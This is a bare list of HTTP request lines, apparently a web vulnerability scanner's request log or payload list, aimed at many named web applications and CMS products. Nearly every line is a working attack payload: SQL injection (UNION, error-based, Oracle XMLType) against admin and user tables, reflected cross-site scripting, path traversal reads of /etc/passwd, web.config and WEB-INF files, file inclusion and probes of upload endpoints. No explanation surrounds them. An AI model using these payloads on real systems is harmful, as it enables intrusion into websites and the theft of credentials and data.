GET /mep-admin/userAction!queryUser.action?start=0&limit=10
GET /admin/picupload.aspx
GET /manager/picupload.aspx
GET /microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
POST /TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
GET /admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
GET /index.php?c=tj&f=include&js=/../../config.php
GET /index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
GET /api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
GET /radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
GET /system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
GET /cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
GET /
GET /styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
GET /web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
GET /forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
POST /Ajax_Handle/UploadPictureHandler.ashx
POST /Ajax_Handle/UploadLocalVideoHandler.ashx
POST /index.php?m=api&a=userpreview
POST /index.php?m=Appmanager&a=loadapp
POST /CMSUploadFile.aspx
POST /api/shop.aspx
GET /sysinfo.jsp
GET /login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
GET /login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
HEAD /file/MyDownLoad.ashx?path=../web.config
GET /file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
GET /broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
GET /feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
GET /channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
GET /login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
GET /api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
HEAD /FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
GET /setup/setup1.jsp
GET /examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
GET /Article/?Type=18%20/**/and/**/1=char(106)--
GET /login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
HEAD /file/EmailDownload.ashx?url=~/web.config&name=web.config
HEAD /file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
HEAD /file/DownLoad.ashx?path=~/Routes.config
GET /file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
GET /file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
HEAD /download.jsp?path=WEB-INF/&name=web.xml
HEAD /page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
POST /mx_form/order_save.php
POST /index.php?app=tag&ac=add&ts=do
GET /member.php?act=index
GET /Article/?KeyWord=1'%20and%201=char(97)%20--
HEAD /apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
GET /admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
GET /Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
GET /Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
GET /Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
GET /Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
HEAD /jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
HEAD /jiep/down.jsp?pathfile=down.jsp%00.txt
GET /index.php?m=Goods&a=showcate&id=1'cfreer
GET /Goods-showcate-id-1.html'cfreer
GET /pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
POST /jvideo/objectbox/selectx_userlist.jsp
GET /yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
GET /Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
GET /Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
GET /celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
GET /ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
GET /ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
GET /burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /oa_server/App_Pages/App_page/UserSpuerAdd.aspx
GET /oa_server/App_Pages/App_page/user_list.aspx
POST /cms/cms/site/cms_site_template_upload.jsp?action=save
GET /cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
GET /deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
GET /deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
GET /lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
POST /web/SubmitLogin.do
GET /pic.aspx?classid=60)%20and%201=char(106)%20--
GET /frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
GET /engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
GET /index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
GET /SRP2003/UserManage/sysuser/modifypage.asp?id=1
GET /venus/AsVenusCA/desk/message/reply.asp
GET /Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
POST /mx_form/order_save.php?form_id=5
HEAD /download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
GET /cms/web/testsql.jsp
POST /web/zwdt/jjj.BjcxServlet
GET /login.php?LOGIN_USER_INCLUDE=/etc/passwd
POST /cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
POST /cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
GET /webUser/webUser!list.action
GET /logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /admin/annual/delete_leave.post.php
GET /admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
GET /admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
GET /admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
GET /down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
POST /jdwm/cgi/getpwd.cgi
GET /public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
GET /public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
GET /cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
GET /cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
GET /cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
GET /CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
GET /forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
GET /forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
GET /search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
POST /public/editext/up/soundsave.asp
POST /public/AspUpload/upload.asp?path=../../upload&processid=1
GET /xyEmployee_checkLoginForUser.do?userName=reer
GET /opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
GET /zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
GET /kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
GET /kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
GET /kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
GET /picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
HEAD /opensoft.asp?%69d=10%20and%201=2
GET /phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
POST /bmsltxDetail.do
POST /setAcceptance.do
POST /setAcceptance.do
GET /setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /nobom.php
GET /infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
GET /lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
GET /lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
GET /admin/Admin_Config.asp
GET /Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
GET /zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
POST /FileUpload
GET /oa_server/App_Pages/App_page/user_update.aspx?userid=172
GET /api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
GET /conformID.asp?Tid=jx'%20and%201=char(106)%20--
GET /DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
HEAD /KS_Data/KesionCMS6.mdb
HEAD /KS_Data/KesionCMS7.mdb
HEAD /KS_Data/KesionCMS8.mdb
HEAD /KS_Data/KesionCMS9.mdb
GET /conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
POST /Asearch.asp
GET /linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
GET /zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
GET /Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
GET /specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
GET /toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
GET /index.php?c=ajax&a=member_login&template=../../ooxx.php
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
GET /workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
POST /search.aspx
HEAD /servlet/fileOpenforms?filename=/index.jsp
HEAD /application/gzhd/bgxz/download.jsp?filename=/index.jsp
GET /livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
GET /truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
GET /NewsList.asp
GET /ActivityList.asp
GET /WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
POST /common/guestbook.php
POST /common/help.php
GET /Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
POST /wap/index.php?a=newslist
GET /index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
GET /?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
GET /?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
POST /admin/uploadFile.action
GET /Adminiscentertrator/AdmIndex.asp
POST /Adminiscentertrator/AdmLinkInsert.asp
GET /corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /NewsList.asp
GET /bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
GET /zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
GET /prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
GET /prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
GET /truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
GET /bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/webissue.asp
GET /article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
